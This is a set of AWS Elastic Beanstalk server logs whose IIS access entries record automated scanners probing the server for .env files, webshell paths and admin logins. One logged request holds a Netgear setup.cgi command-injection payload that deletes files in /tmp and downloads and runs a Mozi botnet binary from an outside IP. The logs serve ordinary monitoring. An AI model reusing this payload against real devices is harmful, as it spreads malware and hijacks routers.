2025-07-15 17:32:00,746 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 18:32:00,780 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 19:32:00,804 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 20:32:00,854 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 21:32:00,892 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 22:32:00,926 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 23:32:00,949 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 11:32:02,077 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 12:32:00,848 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 13:32:00,862 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 14:32:00,910 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 15:32:00,942 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 16:32:00,984 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 17:32:01,002 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 18:32:01,060 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 19:32:01,076 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 20:32:01,130 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 21:32:01,196 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 22:32:01,219 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-14 23:32:00,272 DEBUG 1 PublishLogs - Log publication disabled. Exiting

u_ex25071614_x.log:

#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2025-07-16 14:04:32
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-16 14:04:21 172.31.2.112 GET / - 80 - 172.31.4.150 python-requests/2.32.4 - 403 14 0 1
2025-07-16 14:19:13 172.31.2.112 GET / - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 403 14 0 1
2025-07-16 14:19:13 172.31.2.112 GET /form.html - 80 - 172.31.22.92 curl/8.1.2 - 404 0 2 1
2025-07-16 14:19:13 172.31.2.112 GET /upl.php - 80 - 172.31.22.92 Mozilla/5.0 - 404 0 2 0
2025-07-16 14:19:13 172.31.2.112 GET /t4 - 80 - 172.31.22.92 Mozilla/5.0 - 404 0 2 1
2025-07-16 14:19:13 172.31.2.112 GET /geoip/ - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 404 0 2 1
2025-07-16 14:19:13 172.31.2.112 GET /favicon.ico - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 404 0 2 1
2025-07-16 14:19:14 172.31.2.112 GET /1.php - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 404 0 2 0
2025-07-16 14:19:14 172.31.2.112 GET /systembc/password.php - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 404 0 2 0
2025-07-16 14:19:14 172.31.2.112 GET /password.php - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 404 0 2 0
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2025-07-16 13:10:02
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-16 13:09:29 172.31.2.112 GET /aaa9 - 80 - 172.31.22.92 Mozilla/5.0+zgrab/0.x - 404 0 2 1
2025-07-16 13:09:45 172.31.2.112 GET /aab8 - 80 - 172.31.22.92 Mozilla/5.0+zgrab/0.x - 404 0 2 1
2025-07-16 13:09:51 172.31.2.112 GET / - 80 - 172.31.22.92 Mozilla/5.0+zgrab/0.x - 403 14 0 1
2025-07-16 13:10:08 172.31.2.112 GET /.env - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 404 0 2 0
2025-07-16 13:10:08 172.31.2.112 POST / - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 405 0 1 1
2025-07-16 13:11:02 172.31.2.112 POST / - 80 - 172.31.4.150 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 405 0 1 43
2025-07-16 13:11:01 172.31.2.112 GET /.env - 80 - 172.31.4.150 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 404 0 2 0
2025-07-16 13:12:12 172.31.2.112 GET / - 80 - 172.31.22.92 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_2_3+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.0.3+Mobile/15E148+Safari/604.1 - 403 14 0 1
2025-07-16 13:20:04 172.31.2.112 GET / - 80 - 172.31.22.92 WanScannerBot/1.0 - 403 14 0 1
2025-07-16 13:20:15 172.31.2.112 GET / - 80 - 172.31.22.92 WanScannerBot/1.1 - 403 14 0 1
2025-07-16 13:52:05 172.31.2.112 GET / - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/88.0.4324.190+Safari/537.36 - 403 14 0 2
2025-07-16 13:53:30 172.31.2.112 GET / - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 403 14 0 1
2025-07-16 13:59:15 172.31.2.112 GET /.env - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 404 0 2 1
2025-07-16 13:59:15 172.31.2.112 POST / - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 405 0 1 1
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2025-07-16 12:14:01
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-16 12:13:57 172.31.2.112 GET /webshell.aspx - 80 - 172.31.4.150 Hello+from+Palo+Alto+Networks,+find+out+more+about+our+scans+in+https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity - 404 0 0 14
2025-07-16 12:18:21 172.31.2.112 GET / - 80 - 172.31.4.150 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 403 14 0 1
2025-07-16 12:27:13 172.31.2.112 GET /shell.aspx - 80 - 172.31.4.150 Hello+from+Palo+Alto+Networks,+find+out+more+about+our+scans+in+https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity - 404 0 0 1
2025-07-16 12:27:36 172.31.2.112 GET /shell.asp - 80 - 172.31.4.150 Hello+from+Palo+Alto+Networks,+find+out+more+about+our+scans+in+https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity - 404 0 2 0
2025-07-16 12:33:00 172.31.2.112 GET / - 80 - 172.31.4.150 Linux+Gnu+(cow) - 403 14 0 1
2025-07-16 12:36:09 172.31.2.112 GET / - 80 - 172.31.22.92 Mozilla/5.0+(X11;+FreeBSD+amd64;+rv:5.0)+Gecko/20100101+Firefox/5.0 - 403 14 0 1
2025-07-16 12:39:16 172.31.2.112 GET /webshell - 80 - 172.31.4.150 Hello+from+Palo+Alto+Networks,+find+out+more+about+our+scans+in+https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity - 404 0 2 1
2025-07-16 12:40:08 172.31.2.112 GET / - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.122+Safari/537.36 - 403 14 0 2
2025-07-16 12:40:08 172.31.2.112 GET /favicon.ico - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.122+Safari/537.36 - 404 0 2 1
2025-07-16 12:44:04 172.31.2.112 GET /shell - 80 - 172.31.4.150 Hello+from+Palo+Alto+Networks,+find+out+more+about+our+scans+in+https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity - 404 0 2 1
2025-07-16 12:45:38 172.31.2.112 GET /webshell.asp - 80 - 172.31.4.150 Hello+from+Palo+Alto+Networks,+find+out+more+about+our+scans+in+https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity - 404 0 2 0
2025-07-16 12:49:36 172.31.2.112 GET / - 80 - 172.31.4.150 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_2_3+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.0.3+Mobile/15E148+Safari/604.1 - 403 14 0 1
2025-07-16 12:52:00 172.31.2.112 GET / - 80 - 172.31.22.92 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 403 14 0 1
2025-07-16 12:52:56 172.31.2.112 GET /favicon.ico - 80 - 172.31.22.92 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 404 0 2 0
2025-07-16 12:53:46 172.31.2.112 GET /robots.txt - 80 - 172.31.22.92 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 404 0 2 0
2025-07-16 12:57:39 172.31.2.112 GET / - 80 - 172.31.4.150 Mozilla/4.0+(PSP+(PlayStation+Portable);+2.00) - 403 14 0 1
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2025-07-16 11:05:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-16 11:04:44 172.31.2.112 GET / - 80 - 172.31.4.150 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729) - 403 14 0 2
2025-07-16 11:10:34 172.31.2.112 GET / - 80 - 172.31.22.92 abuse.xmco.fr - 403 14 0 1
2025-07-16 11:10:34 172.31.2.112 GET /.git/config - 80 - 172.31.22.92 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:103.0)+Gecko/20100101+Firefox/103.0+abuse.xmco.fr - 404 0 2 1
2025-07-16 11:10:34 172.31.2.112 GET /server-status - 80 - 172.31.22.92 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:103.0)+Gecko/20100101+Firefox/103.0+abuse.xmco.fr - 404 0 2 1
2025-07-16 11:10:34 172.31.2.112 GET /config.json - 80 - 172.31.22.92 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:103.0)+Gecko/20100101+Firefox/103.0+abuse.xmco.fr - 404 0 2 0
2025-07-16 11:10:34 172.31.2.112 GET /.env - 80 - 172.31.22.92 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:103.0)+Gecko/20100101+Firefox/103.0+abuse.xmco.fr - 404 0 2 0
2025-07-16 11:10:35 172.31.2.112 GET /telescope/requests - 80 - 172.31.22.92 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:103.0)+Gecko/20100101+Firefox/103.0+abuse.xmco.fr - 404 0 2 1
2025-07-16 11:10:35 172.31.2.112 GET /info.php - 80 - 172.31.22.92 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:103.0)+Gecko/20100101+Firefox/103.0+abuse.xmco.fr - 404 0 2 0
2025-07-16 11:15:56 172.31.2.112 POST /boaform/admin/formLogin - 80 - 172.31.22.92 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://18.214.142.244:80/admin/login.asp 404 0 2 2
2025-07-16 11:20:47 172.31.2.112 GET / - 80 - 172.31.4.150 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_2_3+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.0.3+Mobile/15E148+Safari/604.1 - 403 14 0 1
2025-07-16 11:29:23 172.31.2.112 GET / - 80 - 172.31.4.150 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/88.0.4324.190+Safari/537.36 - 403 14 0 1
2025-07-16 11:33:23 172.31.2.112 GET / - 80 - 172.31.4.150 ivre-masscan/1.3+https://github.com/robertdavidgraham/ - 403 14 0 1
2025-07-16 11:57:22 172.31.2.112 GET /.env - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 404 0 2 2
2025-07-16 11:57:22 172.31.2.112 POST / - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 405 0 1 1
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2025-07-16 10:19:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-16 10:18:31 172.31.2.112 GET / - 80 - 172.31.22.92 Mozilla/5.0+(iPad;+CPU+OS+12_2+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/12.1+Mobile/15E148+Safari/604.1 - 403 14 0 2
2025-07-16 10:23:38 172.31.2.112 GET /druid/index.html - 80 - 172.31.22.92 Mozilla/5.0+zgrab/0.x - 404 0 2 1
2025-07-16 10:32:52 172.31.2.112 GET / - 80 - 172.31.22.92 Hello+from+Palo+Alto+Networks,+find+out+more+about+our+scans+in+https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity - 403 14 0 1
2025-07-16 10:39:59 172.31.2.112 GET / - 80 - 172.31.22.92 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_2_3+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.0.3+Mobile/15E148+Safari/604.1 - 403 14 0 2
2025-07-16 10:40:38 172.31.2.112 GET /.env - 80 - 172.31.4.150 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 404 0 2 0
2025-07-16 10:40:38 172.31.2.112 POST / - 80 - 172.31.4.150 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 405 0 1 12
2025-07-16 10:41:56 172.31.2.112 POST /boaform/admin/formLogin - 80 - 172.31.22.92 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://18.214.142.244:80/admin/login.asp 404 0 2 1
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2025-07-16 09:09:59
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-16 09:09:44 172.31.2.112 GET /.env - 80 - 172.31.22.92 Python/3.11+aiohttp/3.12.13 - 404 0 2 1
2025-07-16 09:20:12 172.31.2.112 GET /setup.cgi next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.197.112.162:52195/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 80 - 172.31.22.92 - - 404 0 2 1
2025-07-16 09:37:36 172.31.2.112 GET /.env - 80 - 172.31.4.150 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 404 0 2 0
2025-07-16 09:37:36 172.31.2.112 POST / - 80 - 172.31.4.150 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 405 0 1 1
2025-07-16 09:41:10 172.31.2.112 POST /boaform/admin/formLogin - 80 - 172.31.4.150 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://35.175.6.98:80/admin/login.asp 404 0 2 1
2025-07-16 09:42:51 172.31.2.112 GET /druid/index.html - 80 - 172.31.4.150 Mozilla/5.0+zgrab/0.x - 404 0 2 0
2025-07-16 08:00:31 172.31.2.112 GET /favicon.ico - 80 - 172.31.22.92 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 404 0 2 0
2025-07-16 08:07:39 172.31.2.112 GET /.env - 80 - 172.31.4.150 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 404 0 2 0
2025-07-16 08:07:39 172.31.2.112 POST / - 80 - 172.31.4.150 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 405 0 1 1
2025-07-16 08:18:09 172.31.2.112 GET / - 80 - 172.31.22.92 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_2_3+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.0.3+Mobile/15E148+Safari/604.1 - 403 14 0 1
2025-07-16 08:40:13 172.31.2.112 GET / - 80 - 172.31.22.92 python-requests/2.32.4 - 403 14 0 2
2025-07-16 08:40:31 172.31.2.112 GET / - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/136.0.0.0+Safari/537.36 - 403 14 0 1
2025-07-16 08:51:27 172.31.2.112 GET /.env - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 404 0 2 1
2025-07-16 08:51:27 172.31.2.112 POST / - 80 - 172.31.22.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.5845.140+Safari/537.36 - 405 0 1 88

eb-version-deployment.log:

2025-07-14 10:34:17 Successfully verified ownership of S3 Bucket elasticbeanstalk-us-east-1-958193682725
2025-07-14 10:34:22 Found the latest version manifest file resources/environments/e-pf76dvqga3/_runtime/versions/manifest_1752489039440 from bucket elasticbeanstalk-us-east-1-958193682725 and prefix resources/environments/e-pf76dvqga3/_runtime/versions/
2025-07-14 10:34:23 Downloaded the version info file to C:\cfn\version_manifest
2025-07-14 10:34:23 Downloaded version label backend-v2 from s3 key resources/environments/e-pf76dvqga3/_runtime/_versions/mybusinessportfolio-backend-corinnepadilla/backend-v2
2025-07-14 10:59:58 Successfully verified ownership of S3 Bucket elasticbeanstalk-us-east-1-958193682725
2025-07-14 10:59:59 Version manifest file name already known. The latest version manifest file key is resources/environments/e-pf76dvqga3/_runtime/versions/manifest_1752490778274
2025-07-14 11:00:07 Downloaded the version info file to C:\cfn\version_manifest
2025-07-14 11:00:07 Downloaded version label backend-v3 from s3 key resources/environments/e-pf76dvqga3/_runtime/_versions/mybusinessportfolio-backend-corinnepadilla/backend-v3
2025-07-16 14:27:33 Successfully verified ownership of S3 Bucket elasticbeanstalk-us-east-1-958193682725
2025-07-16 14:27:33 Version manifest file name already known. The latest version manifest file key is resources/environments/e-pf76dvqga3/_runtime/versions/manifest_1752676034468
2025-07-16 14:27:35 Downloaded the version info file to C:\cfn\version_manifest
2025-07-16 14:27:35 Downloaded version label app-250716_072656927458 from s3 key resources/environments/e-pf76dvqga3/_runtime/_versions/mybusinessportfolio-backend-corinnepadilla/app-250716_072656927458
